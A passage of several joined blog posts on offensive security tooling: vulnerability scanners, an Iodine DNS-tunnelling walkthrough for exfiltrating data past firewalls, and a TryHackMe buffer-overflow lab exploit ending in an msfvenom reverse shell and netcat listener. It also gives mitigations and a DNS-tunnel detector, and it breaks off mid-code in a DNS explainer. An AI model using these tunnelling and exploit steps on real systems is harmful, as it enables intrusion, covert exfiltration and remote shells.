If you haven’t seen my post on Nmap then I would recommend giving it a read. It covers Nmap in more detail than I intend to do here. With that said, Nmap is a fantastic vulnerability scanner. Early in my IT career, I had many misconceptions about Nmap. I thought it was merely a network scanner used to identify what hosts were online and what services were running. How naive, Nmap is a comprehensive network auditing tool that can identify and exploit vulnerabilities. I use it on almost every project I’m on. I highly recommend reading more about the different flags and scripts before recklessly running them like I’m about to do.

The image below shows the output of an Nmap scan configured to find vulnerabilities. You can see from the results that it has found some CVEs. I first specified the ‘-g’ flag to set the source port to 53. This is useful for firewall evasion as some firewalls may be configured to allow DNS traffic in from any source. I then specified the ‘-f’ flag to fragment the packets. This works by splitting the packets into multiples of 8 bytes, which can also be beneficial for firewall evasion. Then, I specified ‘-sV’ to get the service versions, ‘-p0-’ for all ports and ‘-O’ to attempt OS detection. Next, I specified the ‘--script’ argument followed by various categories of scripts to execute. Finally, I added the IP address and ‘-T5’ to speed it up.

This configuration is incredibly reckless and you should never use it against production environments. I’m merely using it to demonstrate the power of Nmap. Do NOT do this.

sudo nmap -g 53 -f -sV -p0- -O --script vuln,auth,exploit 10.0.2.5 -T5
Nmap Vulnerability Scanning

Nessus Vulnerability Scanning

Where to start! Nessus from Tenable is a powerful multifunctional vulnerability scanning and auditing solution. It can be used to scan entire ranges of IP addresses or perform audits from uploaded configuration files. Whether you’re on team red or blue, chances are you’ve used it or at least heard of it. Nessus is likely going to be your tool of choice when performing vulnerability assessments or full-on penetration tests. I will probably create a separate article and video focusing on Nessus as part of the Hacker Tools series. All you need to know for the moment is that it is an effective vulnerability scanner. They offer an Essentials version for you to play around with and I highly recommend giving it a go. However, the Professional version has many more cool toys.

The image below is of an advanced scan that I performed against the Metasploitable 2 virtual machine. I configured it to scan all ports (0-65535) and turned off the Denial of Service plugin. Other than that I only changed the reporting to report as much as possible. As you can see it has found a bunch of issues (as expected).

Nessus Vulnerability Scanning

Nikto Web Application Scanning

Nikto is a free CLI web application vulnerability scanner. It will search for interesting directories and files, analyze response headers, check for outdated software, and look for vulnerabilities. It’s a good place to start when performing web application security assessments. Granted, it won’t hack into the website for you, but it will give you a good idea of things to look at during the early stages of the assessment. Nikto can be intrusive and I have seen web applications suffer performance issues when scanning them. However, the hardware that those apps were hosted on wasn’t fit for purpose. I’ve also found that Nikto can be tricked by web application firewalls. It will report a 200 response for every directory that it brute forces, even when the directory doesn’t exist. Or it will misidentify a vulnerability or some other incorrect server-side configuration.

Nikto

Burp Suite Web Application Scanning

No vulnerability scanning article would be complete without Burp Suite from Portswigger. This is the Bugatti Veyron of web application vulnerability scanners. Unfortunately, I only have the community version installed in my home lab but I use the pro version almost daily. The pro version has many more features that allow for automated scanning and vulnerability detection. You still need to manually go through and verify those findings but Burp takes out a lot of the guesswork. It also has an extensive list of additional plugins that you can install to increase the functionality. If you’re looking to get a job in cybersecurity then knowing how to use Burp Suite will probably improve your chances once it comes to that technical test.

Burp Suite

Conclusions

I know I have only scraped the surface of the different vulnerability scanners that are available. However, to cover them all would take forever and I only wanted to cover the ones that you are likely to come across first. Granted, there are some amazing alternatives out there. Where you have Nessus, you also have OpenVAS. Where you have Burp Suite, you also have OWASP ZAP. I'm not saying that one is better than the other, I suppose that comes down to personal preference and these tools are my personal preference. I know a guy who almost refuses to touch anything that isn't command line based. Archie, I salute you. Anyway, definitely give these tools a try against your own test virtual machines. They are a lot of fun.

Data Exfiltration, Firewall Evasion, and DNS Encapsulation with Iodine

Hello World and welcome to HaXeZ. Today I want to talk about the DNS tunneling software Iodine.  Or more specifically I want to talk about data exfiltration and firewall evasion via DNS encapsulation. If you haven’t read my article on DNS then I strongly recommend giving that a quick read-through beforehand.

Scenario

Envision a scenario where you’ve successfully socially engineered your way into a super-secret evil organization. You’ve bypassed physical security and have found a sneaky corner office with an ethernet port. You plug your laptop into the network and the DHCP server assigns you an IP address. Next, you compromise a host and attempt to ping your external Command and Control center (C2). You ping your domain name. The ping returns the correct IP address for your domain name but your pings all time out… what do you do?

Solution

Why would ping be able to resolve your domain name's IP address but not reach it? Other than the obvious case of ICMP being blocked, it could be that the network administrator has blocked all outbound traffic except DNS. Allowing DNS out, directly or through an internal resolver that forwards to the internet, is a common configuration because almost everything breaks without name resolution, but it is also open to abuse: if a query for a name under your domain can reach your server, you can carry arbitrary data in the query name and in the response. By using the DNS tunnelling software Iodine, we can establish a tunnel to an external host over those queries and use it as a proxy to the internet.

Initial Set Up

In order to perform this type of attack, you will need an external server capable of running Iodine. Iodine should be compatible with most Linux distributions but for this demonstration, I'm going to be using a Debian-based cloud server. Furthermore, you will also need your own domain name and access to edit the DNS records for that domain. Finally, you will need a Linux machine to launch your attack. As you can see from the screenshot below, my IP address is currently set to 37.120.198.179 (it's a VPN before you ask).

My Current IP Address before Iodine

Iodine Domain Configuration

For this demonstration, I'm going to be using my spare domain haxr.one. It is currently registered with Google and is using their nameservers. I don't use the domain for anything, I bought it on a whim and am now deciding to do something with it. In order for Iodine to work, we need to create some records so that the Iodine server and client can communicate. As you can see from the screenshot below, I have created an A record, dnstunip, which points to my Debian server's IP address of 185.132.43.9. I then create an NS (nameserver) record, dnstun, and point it at the A record (dnstunip.haxr.one). This delegates everything under dnstun.haxr.one to the Debian server, so any recursive resolver on the internet that is asked about a name under it will end up sending the query to iodined.

Iodine DNS Records

Iodine Server Configuration

On Debian, Iodine can be installed by simply running apt-get install iodine. That's it, that's all the installation you need to do unless Iodine isn't in the repositories; if so, you can clone it directly from the GitHub repository, which documents how to build it. Once Iodine is installed you need to tell it to start listening for DNS queries for your domain by running iodined (the server-side daemon). As you can see from the screenshot below, I have started iodined with the password SecretPassword1337, the tunnel IP address 10.0.0.1, and the domain dnstun.haxr.one. The tunnel IP address is the address the server takes on its own tunnel interface; clients are given addresses from the same subnet. Of the flags, -f keeps iodined in the foreground and -c disables the check that a client's packets keep arriving from the same source IP, which otherwise breaks when the queries are relayed through a pool of recursive resolvers. Two things to check before going further: iodined must be able to bind UDP port 53 on the server, so nothing else (for example a local resolver) can be listening there, and the server's firewall or cloud security group must allow UDP 53 in from anywhere.

sudo iodined -f -c -P SecretPassword1337 10.0.0.1 dnstun.haxr.one
Iodine Server Set Up

You should now be able to check that your Iodine server is set up correctly by visiting https://code.kryo.se/iodine/check-it/ and popping in your domain name.

Checking Iodine Server Configuration

Iodine Client Configuration

Once you have the server running, head back to your client and with sudo, run:

sudo iodine -f -P SecretPassword1337 dnstun.haxr.one

Where SecretPassword1337 is the password you set on the server and dnstun.haxr.one is your domain. The client sends DNS queries for names under that domain to the system's configured resolver (you can also name a specific resolver as an extra argument before the domain). Whatever path those queries take, the delegation brings them to iodined, which answers back through the same chain. The client and server then negotiate the upstream encoding and downstream record type and finally create the tunnel. The client should now have a new network interface called dns0 or something similar, with an IP address within the range you specified on the server (10.0.0.X). That's it, you now have a connection to the server. You can SSH into it and communicate with the outside world.

Iodine Client Set Up

It's also worth launching Wireshark and watching the DNS traffic being sent and received. It is quite bizarre seeing the length of some of the requests and responses. You can see from the screenshot below that the DNS traffic isn't normal. Wireshark decodes it without complaint, though, because every packet is well-formed DNS; it is a protocol analyser, not an intrusion detection system, and unless there are devices on the network configured to look for this type of traffic it probably won't get flagged.

Wireshark PCAP

The Cherry On Top

Ok, but what if you want to browse the internet while you have this DNS tunnel established? There's an SSH trick for that. If you SSH to the DNS tunnel server's IP address (10.0.0.1) with a few extra arguments, you can set up a dynamic port forward on your localhost. Setting your browser's proxy to localhost and that port then routes its traffic through the tunnel. The command is:

sudo ssh -N -D 9090 user@10.0.0.1

where user is your account on the Debian server, 10.0.0.1 is the server's DNS tunnel IP and 9090 is the local port to listen on. The -N argument means no remote command is executed and -D is the dynamic port forwarding flag that makes the magic happen: ssh listens locally as a SOCKS proxy and sends whatever connects to it out through the tunnel. (sudo isn't actually required here; any user can bind a port above 1023.)

SSH Dynamic Port Forwarding

Iodine Browser Configuration

Once that’s done, you can head to your browser’s proxy settings and manually configure a SOCKS proxy on the specified port. Save the changes and you should now be able to browse the web. As you can see from the screenshot below, I have created the SOCKS proxy and when visiting the what is my IP website, it tells me that my IP address is now the IP address of our Debian cloud server.

Browser Proxy Settings
What is my IP showing the IP of the server

Concerns

So why is this a problem? Well, it’s using DNS to exfiltrate data out of an otherwise restricted network. There are plenty of places such as banks, prisons, and other government facilities where internet access might be restricted for genuine reasons. These places do not want sensitive information to escape their network. Banks don’t want their client’s data stolen, prisons don’t want their inmates communicating with the outside world and governments don’t want their secrets leaked. Additionally, if a hacker were able to implant an easily concealed device into a network it could act as a backdoor into that network. This is also how some malware communicates back to the command and control center to receive instructions.

Mitigations

How do you mitigate a service that is behaving exactly as designed? There are actually a number of options. First, you can add domain allow and block lists to your resolver configuration. Blocking known malicious domain names ensures a tunnel can't be established to those names, but an attacker can just register a new domain. A better approach is an allow list, so that only names under approved domains resolve at all, combined with blocking direct outbound UDP and TCP 53 from workstations so that every lookup has to go through an internal resolver that logs and filters. The tunnel in this demonstration depends on a query for an arbitrary domain reaching the authoritative server for it; if queries for unapproved names never leave the network, it never comes up.

An even better approach is to inspect the DNS traffic itself. There are a number of products that identify tunnelling traffic and block it. You saw from the Wireshark screenshot that the DNS tunnel traffic stands out like a sore thumb: very long, high-entropy labels, a constant stream of queries to a single domain, and record types (NULL, TXT, CNAME) that rarely appear in normal client traffic. It is easily distinguishable from genuine DNS traffic, at least to something that is looking for it.
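To make "stands out like a sore thumb" concrete, here is an added example (my code, not from the original post or from the Iodine project) that profiles a resolver log and flags the traits tunnel traffic shows: long, high-entropy client-chosen labels under one zone, a high query count and bulk record types. The log format ("client qtype qname"), the thresholds and the sample lines are all constructed; the tunnel-like labels are generated from hashes rather than captured, and the zone is approximated as the last two labels of the name.

```python
import base64
import hashlib
import math
from collections import defaultdict

# Record types iodine (and most other tunnels) use to carry bulk data downstream.
BULK_QTYPES = {"NULL", "TXT", "CNAME", "MX", "SRV"}


def _tunnel_queries(client, domain, count):
    """Constructed tunnel-like queries. The labels are base32 of sha256 digests so
    the sample is deterministic and high-entropy; they carry no real data."""
    lines = []
    for i in range(count):
        digest = hashlib.sha256(f"chunk-{i}".encode()).digest()
        label = base64.b32encode(digest).decode().lower().rstrip("=")
        qtype = "NULL" if i % 2 == 0 else "TXT"
        lines.append(f"{client} {qtype} {label}.{domain}")
    return lines


# Constructed resolver log in a minimal "client qtype qname" form (not a real
# capture): ordinary lookups from two workstations plus one iodine-style client.
SAMPLE_LOG = "\n".join(
    [
        "10.0.5.12 A www.haxez.org",
        "10.0.5.12 AAAA mail.google.com",
        "10.0.5.12 A api.github.com",
        "10.0.5.13 A www.haxez.org",
        "10.0.5.13 MX haxez.org",
    ]
    + _tunnel_queries("10.0.5.20", "dnstun.haxr.one", 40)
)


def shannon_entropy(text):
    """Bits per character: 0 for a run of one symbol, close to 5 for random base32."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line):
    client, qtype, qname = line.split()
    labels = qname.lower().rstrip(".").split(".")
    # Simplification: the last two labels are treated as the zone. A real detector
    # would use the public suffix list or the actual delegation point (here the
    # attacker delegated dnstun.haxr.one, one level deeper). Everything in front of
    # the zone is chosen by the client, which is where tunnelled data has to go.
    zone = ".".join(labels[-2:])
    prefix = ".".join(labels[:-2])
    return client, qtype.upper(), zone, prefix


def profile(log_text):
    """Per (client, zone): query count, mean prefix length, mean entropy, bulk ratio."""
    acc = defaultdict(lambda: {"queries": 0, "length": 0, "entropy": 0.0, "bulk": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, qtype, zone, prefix = parse_line(line)
        s = acc[(client, zone)]
        s["queries"] += 1
        s["length"] += len(prefix)
        s["entropy"] += shannon_entropy(prefix.replace(".", ""))
        s["bulk"] += qtype in BULK_QTYPES
    return {
        key: {
            "queries": s["queries"],
            "mean_prefix_len": s["length"] / s["queries"],
            "mean_entropy": s["entropy"] / s["queries"],
            "bulk_ratio": s["bulk"] / s["queries"],
        }
        for key, s in acc.items()
    }


def suspicious(profiles, min_queries=20, min_len=30, min_entropy=3.5, min_bulk=0.5):
    """Flag a (client, zone) pair that is chatty and shows at least two tunnel traits."""
    hits = []
    for (client, zone), p in profiles.items():
        reasons = []
        if p["mean_prefix_len"] >= min_len:
            reasons.append("long labels")
        if p["mean_entropy"] >= min_entropy:
            reasons.append("high-entropy labels")
        if p["bulk_ratio"] >= min_bulk:
            reasons.append("bulk record types")
        if p["queries"] >= min_queries and len(reasons) >= 2:
            hits.append((client, zone, reasons))
    return hits


if __name__ == "__main__":
    for client, zone, reasons in suspicious(profile(SAMPLE_LOG)):
        print(f"{client} -> {zone}: {', '.join(reasons)}")
```

Requiring two traits plus volume keeps CDN hostnames (long but low-entropy, few record types) and one-off TXT lookups (SPF, DKIM) from tripping it; the thresholds are starting points to tune against your own baseline, not universal constants.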

Conclusions

I thought this was a fantastic technique when I first came across it. A colleague/friend of mine recommended it to me while I was on an engagement and sure enough, it worked. I was shocked as I didn't think it would be possible to encode data like that into DNS queries. You can have a full-blown conversation with another computer by smuggling it through DNS.

Exploiting Buffer Overflows on TryHackMe

Hello World, and welcome to HaXeZ. Today I want to talk about Buffer Overflows. I’ve struggled with Buffer Overflows for a long time. In other words, I understood the concept but always had trouble applying it practically. Recently I have buried my head in the sand and have just sunk hours into TryHackMe. I came across the buffer overflows learning path and finally understand so now I’m bringing you this article.

Buffer Overflows Setup

The First thing we need to do is to head to TryHackMe and head to the Buffer Overflows Prep room. You can find the room here. Next, we need to spawn the machine and grab the IP address. You can then remote desktop from your Linux virtual machine to the new IP address using Remmina.

Setting Up Immunity

Once connected via RDP to the Windows machine, launch Immunity as an Administrator and configure Mona using the following command.

!mona config -set workingfolder c:\mona\%p
Configuring Mona On Immunity Debugger

After immunity has been configured, you can open the oscp.exe program which is found in the vulnerable program’s directory. You can then run the program by clicking the red arrow. Feel free to poke around on the program by connecting to it using netcat on port 1337.

Fuzzing The Program

We need to fuzz the program to see if it is vulnerable. We do this by sending it progressively longer strings of characters. Eventually the string exceeds the size of the buffer the program copies it into and overwrites what follows on the stack, crashing it. That drastically simplifies the process, but let's start fuzzing. Grab the script below and amend it with the IP address of the host and the command prefix (OVERFLOW1 to OVERFLOW10) you want to target.

#!/usr/bin/env python3
import socket, time, sys

ip = "10.10.237.191"      # target machine
port = 1337               # port oscp.exe listens on
timeout = 5               # seconds to wait for a reply before assuming a crash
prefix = "OVERFLOW1 "     # command prefix for the overflow being tested
string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)                       # read the banner
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)                       # no reply (or a refused connection) means it crashed
  except OSError:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"                     # grow the input by 100 bytes each round
  time.sleep(1)

Ensure the program is running then launch the fuzzing script. Additionally, make a note of the number of bytes it takes to crash the program.

python3 fuzz.py
Buffer Overflow Fuzzing

Create a Cyclic Pattern

Finding the EIP offset requires a pattern at least as long as the number of bytes it took to crash the program, with a few hundred bytes added for headroom. We can use Metasploit's pattern_create.rb to generate a cyclic pattern in which every four-byte sequence is unique, so whatever ends up in EIP identifies its own position in the string. Add around 400 bytes to the length at which the program crashed; here that gives a pattern of 2400 bytes.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400
Metasploit Creating Cyclic Pattern

Next, you need to edit the python payload below and add the Cyclic Pattern to the payload variable. Please be advised that I have snipped some out to save space so the below payload won’t work. Generate and use your own.

import socket

ip = "MACHINE_IP"          # target machine
port = 1337

prefix = "OVERFLOW1 "      # command being overflowed
offset = 0                 # bytes before EIP; set once mona findmsp reports it
overflow = "A" * offset
retn = ""                  # becomes "BBBB", later the little-endian JMP ESP address
padding = ""               # NOP sled, added at the end
# Snipped on the page: replace with the full output of pattern_create.rb.
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4A"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except OSError:
  print("Could not connect.")
finally:
  s.close()

Finding The EIP Offset

Next, we need to find the EIP offset. EIP is the instruction pointer, and the offset is the number of bytes of our input that sit before the saved return address on the stack; once we know it, the four bytes we place at that position become the address the CPU executes from next. By all means, go and research it further; I'm not going to explain a lot in detail here as the post will be long enough. Anyway, restart and reopen the vulnerable OSCP program and then launch your Python exploit script.

python3 exp.py

Once the Python exploit has crashed the program, head over to Immunity Debugger and run the following Mona command to find the EIP offset.

!mona findmsp -distance 2000

This should open the Log window but if it doesn’t then open it manually and look for the following entry in the output.

EIP contains normal pattern : ... (offset 1978)

Creating a Byte Array

For buffer overflows to be successful we need to ensure that our payloads don't contain any bad characters. To explain, bad characters are bytes the program mangles or stops on while handling our input. A null byte (\x00) terminates a C string, so everything after it is dropped; other bytes might be stripped, translated or treated as delimiters. Any of these would corrupt the payload and crash the program rather than execute the code we specify.

First, we need to modify our exploit script and set the ‘retn’ variable to ‘BBBB’. Next, we need to set the offset variable to the EIP offset value we discovered earlier (1978). Then we need to use Mona to create a Byte Array to compare our payload to. This Byte Array will exclude all the bad characters we find starting with the Null Byte.

!mona bytearray -b "\x00"

In order for us to identify the bad characters, we need to create our own byte array to use as a payload. This can be done using the script below. Copy and save the script to a name of your choice, I chose bad.py. Copy the output of the script and paste it into the payload variable of the exploit script.

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()
Creating a Byte Array
Adding Byte Array To Buffer Overflows Exploit Script

Finding Bad Characters

Back to finding bad characters, reopen and run the vulnerable OSCP.exe application. Then run your Python buffer overflows exploit script.

Buffer Overflows Python Script

Once the script has completed, head back to Immunity Debugger and look for the ESP register in the CPU window.

ESP Address in Immunity Debugger

Right-click the ESP register, copy the address to your clipboard, then run the following Mona command to compare the bytes at that address with the byte array Mona created earlier. As shown below, this produces a window listing all the bad characters that we need to eliminate from our script. However, some of these may not really be bad. For example, \x07 and \x08 are both listed, but it could be that the corruption caused by \x07 bleeds into \x08 and makes it look bad too. Therefore, we repeat the process, eliminating one bad character at a time and re-comparing, until the list stops changing.

!mona compare -f C:\mona\oscp\bytearray.bin -a 01AFFA30
Buffer Overflows Bad Characters

Repeating The Process

I won’t walk you through each step individually but I will include some code below which should help you to repeat the steps we just did.

Create Byte Array
!mona bytearray -b "\x00"
Remove byte from payload string
run
get ESP address
Compare
!mona compare -f C:\mona\oscp\bytearray.bin -a 018BFA30

!mona bytearray -b "\x00\x07"
remove \x07 byte from payload string
run
get ESP address
Compare
!mona compare -f C:\mona\oscp\bytearray.bin -a 019AFA30

!mona bytearray -b "\x00\x07\x2e"
remove \x2e byte from payload string
run
get ESP address
Compare
!mona compare -f C:\mona\oscp\bytearray.bin -a 019AFA30

Keep repeating the process until there are no more bad characters and your comparison results look like the image below.

Immunity Debugger Bad Character Comparison

Finding The Jump Point

Now that we have identified all the bad characters, we can use Mona to find a jump point in the application that excludes all these bad characters. Again, I don't have a clue what I'm talking about, I'm just following a process and rewriting it. The idea, briefly: a jump point is an instruction such as JMP ESP inside one of the modules the program has loaded, at an address that contains none of the bad characters and in a module without ASLR or rebasing, so the address is the same on every run. We overwrite EIP with that address; when the function returns, the CPU executes JMP ESP, which jumps to wherever ESP points, and ESP points at the rest of our buffer, where the shellcode sits. As you can see from the command below, we are asking Mona to find such a jump point, excluding all the bad characters we have eliminated.

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"
Buffer Overflows Jump Point

Creating The Buffer Overflow Exploit

We now need to create our payload. As can be seen from the snippet and image below, we can use msfvenom to create it for us. Ensure you select the correct payload (32-bit Windows, matching the target), change LHOST to your attack host's address, and pass the bad characters with -b so the encoder avoids them. EXITFUNC=thread makes the shellcode exit only its own thread afterwards rather than the whole process, and -f c prints the bytes as a C-style escaped string that pastes straight into the Python script.

msfvenom -p windows/shell_reverse_tcp LHOST=10.18.127.129 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

Msfvenom Buffer Overflows Payload

Next, we need to modify our Python exploit script to add the payload and the return address (the JMP ESP address we just found). Ensure that the payload starts with an open bracket and a double quote and closes with a double quote and a close bracket; that is how the C-format output from msfvenom becomes one Python string. The return address must be written in little-endian order: x86 stores the least significant byte first, so the JMP address 625011af becomes \xaf\x11\x50\x62. See the image below for details; the original JMP address is kept in blue as a comment. You also need to add the padding as shown below (padding = "\x90" * 16), a short NOP sled between the return address and the shellcode so that the encoded payload's decoder stub has room to work around ESP without overwriting itself.

Buffer Overflows Exploit
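Here is an added example (my code, not the TryHackMe room's script or the page's) that pulls the mechanics of the last few sections into one place: generating the cyclic pattern and recovering the EIP offset from the value that landed in EIP, producing the byte array minus the bad characters found so far, packing the JMP ESP address little-endian, and assembling and sanity-checking the final buffer before anything is sent. The JMP ESP address, offset and bad characters are the ones from this page; the shellcode is a constructed stand-in for msfvenom output, and the target address in the commented-out send is the lab IP from the fuzzer.

```python
import socket
import struct

# Bad characters the Mona comparison loop turned up for this binary: \x00 plus the
# three that appeared one at a time.
BADCHARS = {0x00, 0x07, 0x2e, 0xa0}

# Constructed stand-in for msfvenom output; a real payload is a few hundred bytes.
SAMPLE_SHELLCODE = b"\xcc" * 8


def cyclic_pattern(length):
    """The sequence pattern_create.rb emits (Aa0Aa1...Aa9Ab0...), cut to length.
    Every four-byte window is unique, which is what makes the offset findable."""
    chunks = []
    for upper in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in "abcdefghijklmnopqrstuvwxyz":
            for digit in "0123456789":
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern, eip_value):
    """Where the four bytes now in EIP sit in the pattern (what "!mona findmsp"
    reports as the EIP offset). EIP holds them as a little-endian integer, so
    pack them back into byte order before searching. Returns -1 if absent."""
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern.find(needle)


def badchar_payload(excluded=(0x00,)):
    """Bytes 0x00-0xff minus those found bad so far; pass the same set to
    "!mona bytearray -b" so the comparison has a matching reference file."""
    return bytes(b for b in range(256) if b not in excluded)


def contains_badchars(data, badchars):
    """Sorted list of the bad bytes present in data (empty means clean)."""
    return sorted({b for b in data if b in badchars})


def pack_ret(address):
    """Little-endian encoding of the JMP ESP address: x86 stores the low byte
    first, so 0x625011af becomes b"\\xaf\\x11\\x50\\x62"."""
    return struct.pack("<I", address)


def build_buffer(prefix, offset, ret_addr, shellcode, badchars=BADCHARS, nop_sled=16):
    """prefix + filler up to EIP + return address + NOP sled + shellcode, the same
    layout the exploit script assembles, with the checks done up front."""
    found = contains_badchars(shellcode, badchars)
    if found:
        raise ValueError("shellcode contains bad characters: " + " ".join(f"\\x{b:02x}" for b in found))
    retn = pack_ret(ret_addr)
    if contains_badchars(retn, badchars):
        raise ValueError("return address contains a bad character; pick another JMP ESP")
    return prefix + b"A" * offset + retn + b"\x90" * nop_sled + shellcode


def eip_at(buffer, prefix, offset):
    """The four bytes that overwrite the saved return address: a sanity check
    before anything is sent."""
    start = len(prefix) + offset
    return buffer[start:start + 4]


def send_buffer(ip, port, buffer, timeout=5):
    """Deliver the buffer the way the page's script does (banner, payload, CRLF)."""
    with socket.create_connection((ip, port), timeout=timeout) as s:
        s.recv(1024)
        s.sendall(buffer + b"\r\n")


if __name__ == "__main__":
    pattern = cyclic_pattern(2400)
    print("pattern starts:", pattern[:12])
    buf = build_buffer(b"OVERFLOW1 ", 1978, 0x625011af, SAMPLE_SHELLCODE)
    print("EIP will be overwritten with:", eip_at(buf, b"OVERFLOW1 ", 1978).hex())
    # send_buffer("10.10.237.191", 1337, buf)   # uncomment against the lab machine
```

The two ValueError checks are the part worth copying into your own scripts: a bad character in the return address is a mistake that is easy to make and miserable to debug, because the crash looks exactly like a wrong offset.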

Exploiting The Buffer Overflow

First, reopen the oscp.exe vulnerable program and run it. Next, start a netcat listener on your attack host on the port you gave as LPORT.

┌─[✗]─[joe@Parrot]─[~/OF]
└──╼ $sudo nc -lvnp 4444
listening on [any] 4444 ...
NetCat Listener

Finally…. RUN… THE… EXPLOIT…

Buffer Overflow Complete

Conclusions

Going through the Buffer Overflow series on TryHackMe has taught me a lot about failure and success. It has allowed me to reflect on how impatient I can be when things aren’t going my way. I feel that this is such a relevant topic in society today. A lot of things aren’t going our way right now. Ukraine is being invaded by Russia, the cost of living crisis, our clueless leadership and so much more. It’s all incredibly frustrating to sit back and watch. Sometimes I just want to fast forward life until it isn’t so crappy again. However, our failures and setbacks allow us to appreciate the good things in life when they do happen. I was overjoyed when I finally got this exploit to work. Granted it is insignificant to the problems in the world but perhaps something better is just on the horizon.

Domain Name System Simplified

Hello world, and welcome to HaXeZ. Today I want to talk about the Domain Name System (DNS). I know, I know, most of you probably already know how DNS works. However, I’m going to be writing an article soon about Firewall Evasion and Data Exfiltration through DNS Tunnelling and I needed to brush up on my DNS knowledge. Never wanting to waste an opportunity, I thought it would make for a good blog post and video so here we are.

What Is The Domain Name System?

Domain Name System or DNS is a hierarchical system for translating human-readable names into IP addresses. It relies on nameservers at several levels. A nameserver holds the records for a zone, whether that is the root, a top-level domain (TLD) or an individual domain. At the very top of the hierarchy are the root servers, which hold the delegation records for the top-level domains. This information is stored in something called a zone file. You can sometimes pull an entire zone with a DNS zone transfer (AXFR); this only works when the nameserver is misconfigured to allow transfers to anyone, which is why it is a classic reconnaissance check. zonetransfer.me is set up deliberately to allow it. The example below uses Nmap.

sudo nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p53 nsztm1.digi.ninja
DNS Zone File

The zone file contains entries such as the nameservers for the top-level domains. Underneath the root nameservers are the top-level domain nameservers. The same principle applies here in that the top-level domain nameservers contain information about the fully qualified domain nameservers. At the bottom of the hierarchy is the domain’s authoritative nameservers which contain records such as A, MX, NS, TXT, and many others.

What Is The Domain Name System?

Domain Structure

If we look at the web address haxez.org we can see that it has multiple sections. You may not know about the first section as it doesn't tend to be represented by anything. It can be written as a full stop at the end of the name, but most software doesn't require the full stop in order for it to work. That trailing full stop after the 'ORG' section represents the root zone. Root nameservers hold the addresses of the top-level domain (TLD) nameservers (COM, NET, ORG and so on). The 'ORG' section of the address is the top-level domain. The 'haxez' portion is the domain registered under it. Anything that comes before haxez.org is a subdomain; for example, in www.haxez.org, www is the subdomain and www.haxez.org as a whole is the fully qualified domain name.

Domain Name System Domain Structure

How Does The Domain Name System Work?

When you type a URL into your browser a number of things happen. Using various online resources I’ve broken it down into 10 steps. I’ve overly simplified the process but there is a lot more going on such as caching, virtual host magic, TCP handshakes, and GET requests.

  1. The client queries the DNS resolver for the IP address of the domain name.
  2. The DNS resolver queries a root nameserver for the location of the top-level domain (.COM, .ORG, .CO.UK, .NET) nameserver.
  3. The root nameserver responds to the DNS resolver with the IP address of the top-level domain nameserver.
  4. The DNS resolver then queries the top-level domain nameserver for the location of the domain’s authoritative nameserver.
  5. The top-level domain nameserver tells the DNS resolver the IP address of the authoritative nameserver.
  6. The DNS resolver then queries the authoritative nameserver for the IP address of the domain.
  7. The authoritative nameserver tells the DNS resolver the IP address of the domain.
  8. The DNS resolver responds to the client with the IP address of the domain.
  9. The client then sends the request to the target IP address.
  10. The target responds with the information the client requested.
Domain Name System Process
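As an added example (not part of the original post), here are the ten steps above as a small iterative resolver run against a constructed snapshot of the delegation chain from the nslookup session that follows, with one server per level and the addresses that session returned: the root hint, a .com server holding glue for Google's nameservers, and ns1.google.com holding the A record for mail.google.com. Real resolvers add caching, retries across all the listed servers and lookups for nameservers that arrive without glue; none of that is modelled.

```python
# Constructed snapshot of the delegation chain (one server per level; a real
# resolver knows thirteen root names, picks among the .com servers and caches
# everything it learns). Addresses are the ones the nslookup session returned.
SERVERS = {
    "198.41.0.4": {  # a.root-servers.net, serves the root zone "."
        "zone": ".",
        "records": {},
        "delegations": {
            "com.": {
                "ns": ["a.gtld-servers.net.", "b.gtld-servers.net."],
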